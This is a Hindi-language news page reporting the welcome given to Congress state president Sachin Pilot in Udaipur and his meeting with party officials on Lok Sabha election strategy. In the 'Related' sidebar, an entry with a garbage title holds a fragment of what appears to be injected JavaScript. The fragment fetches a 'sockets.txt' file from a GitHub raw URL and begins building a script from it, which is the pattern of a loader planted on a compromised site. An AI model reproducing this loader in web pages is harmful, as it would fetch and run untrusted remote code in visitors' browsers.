सचिन पायलट का भव्य स्वागत

Date:

IMG_3105उदयपुर। केंद्रीय मंत्री और कांग्रेस के नव नियुक्त प्रदेशाध्यक्ष सचिन पायलट का आज उदयपुर पहुंचने पर कांग्रेसी नेताओं और कार्यकर्ताओं द्वारा भव्य स्वागत किया गया। श्री पायलट यहां लोकसभा चुनाव को लेकर कार्यकर्ताओं से फीडबैक लेने आए हैं। पायलट ने सर्किट हाउस में संभाग के पदाधिकारियों और जनप्रतिनिधियों की बैठक ली।
प्रदेशाध्यक्ष का पदभार ग्रहण करने के बाद पहली बार उदयपुर पहुंचे केंद्रीय मंत्री सचिन पायलट का पहाड़ी बस स्टैंड पर जोरदार स्वागत किया गया। कांग्रेसी नेता परसराम मदेरणा की अंत्येष्ठि में शामिल होकर पायलेट सड़क मार्ग से सिरोही, गोगुंदा होते हुए उदयपुर पहुंचे। गोगुंदा में सचिन पायलट का जगह-जगह स्वागत हुआ। उन्होंने गोगुंदा में आमसभा को संबोधित भी किया तथा कार्यकर्ताओं की बात सुनी। श्री पायलेट का इससे पूर्व उदयपुर जिले की सीमा क्षेत्र में आते ही देहात कांग्रेस जिलाध्यक्ष लालसिंह झाला और पूर्व विधायक मांगीलाल गरासिया द्वारा क्यारी गांव में स्वागत किया गया। गोगुंदा से उदयपुर तक पायलट का करीब दो दर्जन जगह कांग्रेसी कार्यकर्ताओं द्वारा ढोल-नगाड़े बजाकर तो कहीं फूल-मालाओं से लाद कर स्वागत किया गया। उदयपुर शहर में आते ही, फतहपुरा पर शहर जिला कांग्रेस द्वारा स्वागत किया गया, जहां पहुंचने पर पायलट की अगुवाई में सांसद रघुवीर मीणा, शहर जिलाध्यक्ष नीलिमा सुखाडिय़ा, पूर्व विधायक त्रिलोक पूर्बिया, प्रतिपक्ष नेता दिनेश श्रीमाली, पार्षद अजय पोरवाल, संजय पगारिया सहित कई कांग्रेसी नेता मौजूद थे। यूथ कांग्रेस के अध्यक्ष राहुल हेमनानी ने भी भारी भीड़ के साथ आकर पायलट का स्वागत किया। पहाड़ी बस स्टैंड पर देहात कांग्रेस द्वारा स्वागत किया गया, जहां देहात कांग्रेस जिलाध्यक्ष लालसिंह झाला, पूर्व मंत्री और विधायक मांगीलाल गरासिया, दयाराम परमार, गजेंद्रसिंह शक्तावत, गणेश परमार, केवलचंद लबाना ने स्वागत किया।
सर्किट हाउस में जारी है मुलाक़ात : प्रदेशाध्यक्ष सचिन पायलट के सर्किट हाउस पहुंचने पर उन्होंने संभाग के जिलेवार पदाधिकारियों, पूर्व विधायकों, जनप्रतिनिधियों, सांसद, विधायकों व विधानसभा चुनाव में विधायक के प्रत्याशी रहे जनप्रतिनिधियों से मुलाकात शुरू कर दी है। आगामी लोकसभा के चुनाव के लिए भी तैयारियों को लेकर रणनीति के बारे में चर्चा की। लोकसभा चुनाव में कांग्रेस की स्थिति मजबूत करने के लिए निर्देश दिए जा रहे हैं। साथ ही सभी जिलों में कांग्रेस की स्थिति पर विचार किया जा रहा है। माना जा रहा है कि लोकसभा के उम्मीदवार का चयन भी काफी हद तक आज की इस मीटिंग पर निर्भर करेगा। सर्किट हाउस में संभागभर से आए कांग्रेसी नेताओं का जमावड़ा लगा हुआ है। शाम छह बजे उदयपुर शहर के बारे में चर्चा की जाएगी।

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Share post:

Subscribe

spot_imgspot_img

Popular

More like this
Related

oHmtKvYkl

QYRRUUjF;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script...

हिन्दुस्तान जिंक के स्वास्थ्य अभियान के तहत विश्व स्तनपान सप्ताह आयोजित

हिंदुस्तान जिंक, द्वारा स्वास्थ्य अभियान के तहत् विश्व स्तनपान...

हिंदुस्तान जिंक द्वारा खनन कार्यों में आंतरिक प्रतिभा के कौशल एवं अवसर वृद्धि हेतु जावर में ‘हिंदुस्तान जिंक माइनिंग अकादमी’ का शुभारंभ

इस अनूठी पहल से भूमिगत खदानों में जंबो हेल्पर्स प्रमाणित ऑपरेटर बन सकेंगे - पांच महीने तक चलनेवाले इस प्रशिक्षण कार्यक्रम में 16 सप्ताह का क्लासरूम इंस्ट्रक्शन शामिल होगा उदयपुर, 30 जुलाई, 2022: देश की एकमात्र और विश्व...